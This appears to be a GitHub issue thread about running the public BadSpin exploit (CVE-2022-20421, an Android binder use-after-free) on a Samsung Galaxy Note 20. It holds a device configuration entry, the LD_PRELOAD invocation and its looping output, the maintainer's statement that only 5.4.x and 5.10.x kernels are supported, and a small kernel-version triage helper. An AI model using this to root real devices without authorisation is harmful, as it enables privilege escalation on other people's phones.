Closed alberticoalmaguer closed 1 year ago
```c
{
    .name = "Samsung Galaxy Note 20",
    .model = "SM-N981U",
    .android_version = 12,
    .android_security_patch.year = 2022,
    .android_security_patch.month = 9,
    .kernel_version = KERNEL_VERSION(4, 19, 113),
    .ram_offset = 0x28000000UL,
}
```

QS1: Is the exploit only working on kernel version 5.x.x?
QS2: How can I get the `ram_offset`?

```
c1q:/ $ LD_PRELOAD=/data/local/tmp/libbadspin.so sleep 1
Bad Spin Exploit (CVE-2022-20421) by 0xkol
[x] Looking for binder_proc's inner_lock offset
[x] Trigger vulnerability... (mode = 1)
[x] Trigger use-after-free
[x] Finish spinning at spin_lock()
[x] Trigger vulnerability... (mode = 1)
[x] Trigger use-after-free
[x] Finish spinning at spin_lock()
[x] Trigger vulnerability... (mode = 1)
[x] Trigger use-after-free
[x] Finish spinning at spin_lock()
[x] Trigger vulnerability... (mode = 1)
[x] Trigger use-after-free
[x] Finish spinning at spin_lock()
[x] Trigger vulnerability... (mode = 1)
[x] Trigger use-after-free
[x] Finish spinning at spin_lock()
[x] Trigger vulnerability... (mode = 1)
```
The exploit works on devices running on kernel versions 5.4.x and 5.10.x only.
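A small triage helper, added here as an example and not part of the BadSpin repository: it takes a device entry shaped like the struct posted above and reports whether its kernel falls in one of the series the maintainer names (5.4.x or 5.10.x). The `struct device_entry` type, the `kernel_in_stated_range` and `count_in_range` functions, and the second sample entry are assumptions introduced for the example; only the field names and the Note 20 values come from this issue. The `KERNEL_VERSION` packing is the one used by the Linux kernel's `include/linux/version.h`.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/* Same packing as the Linux kernel's KERNEL_VERSION() macro:
 * major in bits 16..23, minor in bits 8..15, patch clamped to 255. */
#define KERNEL_VERSION(a, b, c) (((a) << 16) + ((b) << 8) + ((c) > 255 ? 255 : (c)))

/* Hypothetical device-entry type; field names mirror the struct posted in this issue. */
struct device_entry {
    const char *name;
    const char *model;
    int android_version;
    struct { int year, month; } android_security_patch;
    unsigned int kernel_version;   /* packed with KERNEL_VERSION() */
    unsigned long ram_offset;
};

/* Decode a packed kernel version back into major.minor.patch. */
static void split_kernel_version(unsigned int v, unsigned *major, unsigned *minor, unsigned *patch)
{
    *major = (v >> 16) & 0xff;
    *minor = (v >> 8) & 0xff;
    *patch = v & 0xff;
}

/* True when the entry's kernel is in a series the maintainer states the exploit
 * works on (5.4.x or 5.10.x). Anything else, such as the 4.19.113 kernel of the
 * posted Note 20 entry, is reported as outside the stated range. */
bool kernel_in_stated_range(const struct device_entry *d)
{
    unsigned major, minor, patch;
    split_kernel_version(d->kernel_version, &major, &minor, &patch);
    return major == 5 && (minor == 4 || minor == 10);
}

/* Constructed sample list: entry 0 is the one posted in this issue,
 * entry 1 is a constructed placeholder with a kernel inside the stated range. */
const struct device_entry sample_devices[] = {
    { .name = "Samsung Galaxy Note 20", .model = "SM-N981U", .android_version = 12,
      .android_security_patch.year = 2022, .android_security_patch.month = 9,
      .kernel_version = KERNEL_VERSION(4, 19, 113), .ram_offset = 0x28000000UL },
    { .name = "constructed example device", .model = "PLACEHOLDER-MODEL", .android_version = 12,
      .android_security_patch.year = 2022, .android_security_patch.month = 9,
      .kernel_version = KERNEL_VERSION(5, 10, 43), .ram_offset = 0x0UL },
};
const size_t sample_device_count = sizeof(sample_devices) / sizeof(sample_devices[0]);

/* Print one triage line per entry and return how many are in the stated range. */
size_t count_in_range(const struct device_entry *list, size_t n)
{
    size_t hits = 0;
    for (size_t i = 0; i < n; i++) {
        unsigned major, minor, patch;
        split_kernel_version(list[i].kernel_version, &major, &minor, &patch);
        bool ok = kernel_in_stated_range(&list[i]);
        printf("%-28s %-18s kernel %u.%u.%u  -> %s\n", list[i].name, list[i].model,
               major, minor, patch, ok ? "in stated range" : "outside stated range");
        hits += ok ? 1 : 0;
    }
    return hits;
}

int main(void)
{
    size_t hits = count_in_range(sample_devices, sample_device_count);
    printf("%zu of %zu entries have a kernel in the 5.4.x / 5.10.x series\n", hits, sample_device_count);
    return 0;
}
```

Run against the posted entry, the helper reports the Note 20's 4.19.113 kernel as outside the stated range, which is consistent with the log above looping on "Trigger vulnerability" without ever getting further.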
Great job. But is it possible to work on a Pixel 6 emulator?